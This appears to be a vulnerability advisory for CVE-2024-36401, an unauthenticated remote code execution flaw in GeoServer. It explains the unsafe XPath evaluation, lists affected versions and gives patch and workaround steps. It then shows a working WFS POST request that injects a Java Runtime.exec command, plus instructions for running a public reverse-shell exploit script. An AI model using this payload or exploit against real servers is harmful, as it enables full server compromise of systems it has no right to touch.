Vulnerable Version
2.23.2, 2.23.6, versions 2.24.0 to 2.24.3, and version 2.25.0
Fixed Version
update in latest version
Base Score
9.8 critical
Vendor Description:-
GeoServer is an open-source server written in Java that allows users to share, process and edit geospatial data. Designed for interoperability, it publishes data from any major spatial data source using open standards. GeoServer has evolved to become an easy method of connecting existing information to virtual globes such as Google Earth and NASA World Wind as well as to web-based maps such as OpenLayers, Leaflet, Google Maps and Bing Maps. GeoServer functions as the reference implementation of the Open Geospatial Consortium Web Feature Service standard, and also implements the Web Map Service, Web Coverage Service and Web Processing Service specifications.
CVE-2024-36401 Vulnerability Description:-
The flaw results from the GeoTools package, which GeoServer uses, evaluating XPath expressions in an unsafe manner. The main source of the vulnerability is the way GeoServer uses XPath, a language for XML document querying, to handle user-supplied information. These XPath expressions are handled by GeoServer using the commons-jxpath library. However, these expressions are incorrectly applied to both complex and basic feature types, even though they should only be evaluated for complex feature types (such as Application Schema data stores). Due to the potential for arbitrary code execution when processing maliciously generated data, this poses a serious security risk to all instances of GeoServer.
The GeoTools library in GeoServer is in charge of handling feature type property names. Similar to columns in a database table, feature types indicate the attributes that each feature in a geographic dataset may possess, hence defining the schema for features. Although this schema is essential for handling geographical data, the system is susceptible due to the incorrect treatment of feature type properties during XPath evaluation.
Impact and Potential Risks
Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the GeoServer host, potentially leading to full server compromise.
The severity of this vulnerability is heightened by the fact that it can be exploited by unauthenticated attackers, increasing the attack surface.
Mitigation
- To address the aforementioned vulnerabilities, a new version and security patch have been formally released. For protection, please install updates as soon as you can.
Link to download: https://github.com/geoserver/geoserver/tags
https://github.com/geotools/geotools/tags
- To get the gt-app-schema, gt-complex, and gt-xsd-core jar files, you can get the patch versions 2.25.1, 2.24.3, 2.24.2, 2.23.2, 2.21.5, 2.20.7, 2.20.4, 2.19.2, and 2.18.0 from https://geoserver.org. For restoration, replace the relevant files in the impacted system’s WEB-INF/lib.
Other protective measures
The following actions can be taken to provide short-term assistance if the appropriate users are unable to install updates: Although it may affect certain GeoServer functionality, deleting the gt-complex-x.y.jar file in GeoServer will remove vulnerable code (x.y is the version of GeoTools, such as gt-complex-31.1.jar in GeoServer 2.25.1). The GeoServer deployment may fail if an extension in use requires a gt-complex module.
POC
The POST method POC is:
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>
Now success2 folder create in directory
Via direct exploit method to gain RCE
Repository Setup
git clone https://github.com/Chocapikk/CVE-2024-36401.git
cd CVE-2024-36401then Install the required libraries using pip:
pip install -r requirements.txtTo exploit a single target, use the following command with the required parameters:
python exploit.py -u -ip -rp [--proxy ] [--bind-host ] [--bind-port ]Example:-
python exploit.py -u http://localhost:8080 -ip 192.168.1.36 -rp 1337 --proxy http://127.0.0.1:8081
POC Video:-
https://www.youtube.com/watch?v=jNj7bRbO1ww
Reference:-
https://github.com/Chocapikk/CVE-2024-36401
https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.md